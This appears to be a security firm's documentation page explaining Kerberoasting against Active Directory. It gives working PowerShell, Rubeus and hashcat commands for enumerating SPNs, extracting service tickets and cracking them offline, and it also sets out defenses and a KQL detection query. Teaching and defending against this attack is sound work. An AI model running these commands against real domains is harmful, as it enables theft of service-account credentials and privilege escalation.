HK
Helix Kitten Security
/
← Back to Documentation

Kerberoasting: Active Directory Attack Technique

👤 Helix Kitten Research 📅 March 15, 2026 ⏱ 12 min read
Active Directory Kerberos Credential Access T1558.003

Overview

Kerberoasting is a post-exploitation attack technique that targets Service Principal Names (SPNs) in Active Directory environments. By requesting Kerberos service tickets (TGS) for accounts with registered SPNs, an attacker can extract ticket data and attempt offline password cracking without triggering account lockout policies.

This technique is mapped to MITRE ATT&CK T1558.003 (Steal or Forge Kerberos Tickets: Kerberoasting) and remains one of the most effective methods for privilege escalation within enterprise Active Directory environments.

ℹ️
Kerberoasting requires only a valid domain user account — no elevated privileges are needed to request service tickets, making it a low-barrier, high-impact attack.

How Kerberoasting Works

The Kerberos authentication protocol uses service tickets encrypted with the NTLM hash of the service account password. The attack exploits this design:

  1. Authenticate to the domain with any valid user credentials
  2. Query Active Directory for accounts with SPNs registered (using LDAP queries)
  3. Request TGS tickets for discovered SPNs from the Key Distribution Center (KDC)
  4. Extract the encrypted ticket data which contains the service account's password hash
  5. Crack offline using tools like Hashcat or John the Ripper against the RC4/AES encrypted ticket

Because the TGS request is a normal Kerberos operation, it generates minimal suspicious activity in default Windows event logging configurations.

Prerequisites

  • Valid domain user credentials (any authenticated user)
  • Network access to a Domain Controller (TCP port 88 for Kerberos)
  • Target accounts must have SPNs registered (service accounts, SQL servers, IIS app pools)
  • Weak or guessable passwords on service accounts (for successful cracking)

Step-by-Step Attack

Enumerate SPNs with PowerShell

Use native Active Directory PowerShell modules to discover accounts with SPNs:

powershell 
# Enumerate all user accounts with SPNs
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName |
  Select-Object Name, SamAccountName, ServicePrincipalName

# Alternative: setspn.exe (built-in Windows tool)
setspn -T corp.local -Q */*

Extract Tickets with Rubeus

Rubeus is a C# toolset for Kerberos interaction and abuse. It can request and extract service tickets in a crackable format:

cmd 
# Request tickets for all kerberoastable accounts
Rubeus.exe kerberoast /outfile:hashes.txt

# Target a specific SPN
Rubeus.exe kerberoast /spn:MSSQLSvc/db01.corp.local:1433

# Use RC4 downgrade for easier cracking (noisier)
Rubeus.exe kerberoast /tgtdeleg

Crack with Hashcat

bash 
# Crack Kerberos 5 TGS-REP (RC4 - type 23)
hashcat -m 13100 hashes.txt wordlist.txt -r rules/best64.rule

# Crack AES256 tickets (type 17/18 — slower)
hashcat -m 19700 hashes.txt wordlist.txt --force

# Check results
hashcat -m 13100 hashes.txt --show
$krb5tgs$23$*svc_sql$CORP.LOCAL*$...:Summer2024!
⚠️
Legal Notice: Only perform Kerberoasting attacks against systems you are authorized to test. Unauthorized access to computer systems is a criminal offense under laws such as the CFAA (US) and Computer Misuse Act (UK).

Detection & Defense

Defending against Kerberoasting requires a multi-layered approach combining preventive controls and detection mechanisms:

Preventive Controls

  • Strong service account passwords: Use 25+ character randomly generated passwords for all service accounts with SPNs
  • Group Managed Service Accounts (gMSA): Automatically rotate 240-character complex passwords every 30 days
  • AES encryption only: Disable RC4_HMAC_MD5 via GPO to force AES256, making cracking computationally expensive
  • Minimize SPNs: Audit and remove unnecessary SPNs from user accounts; use computer accounts where possible
  • Privileged Access Management: Avoid assigning Domain Admin or high-privilege group memberships to service accounts

Detection Methods

  • Windows Event ID 4769: Monitor for TGS requests with RC4 encryption (Ticket Encryption Type 0x17)
  • Anomaly detection: Alert on users requesting TGS tickets for an abnormal number of services
  • Honey SPNs: Create decoy service accounts with SPNs as tripwires — any TGS request triggers an alert
  • Sigma rules: Deploy community detection rules for Kerberoasting activity patterns
KQL (Microsoft Sentinel) 
// Detect potential Kerberoasting via RC4 TGS requests
SecurityEvent
| where EventID == 4769
| where TicketEncryptionType == "0x17"   // RC4
| where ServiceName !endswith "$"         // Exclude machine accounts
| summarize Count=count() by TargetUserName, IpAddress, bin(TimeGenerated, 5m)
| where Count > 5

Tools Used

  • Rubeus — C# Kerberos abuse toolkit (GhostPack)
  • Impacket (GetUserSPNs.py) — Python-based Kerberoasting from Linux
  • PowerView (Get-DomainSPNTicket) — PowerShell SPN enumeration
  • Hashcat — GPU-accelerated password cracking
  • John the Ripper — CPU-based hash cracking with krb5tgs module
  • BloodHound — AD attack path visualization and Kerberoastable user identification

References

  • MITRE ATT&CK T1558.003 — Steal or Forge Kerberos Tickets: Kerberoasting
  • Tim Medin — "Attacking Microsoft Kerberos: Kicking the Guard Dog of Hades" (DerbyCon 2014)
  • Sean Metcalf — ADSecurity.org Kerberoasting guide
  • SpecterOps — "Roasting AS-REPs" and "Targeted Kerberoasting"
  • Microsoft — "Detecting Kerberoasting Activity" security guidance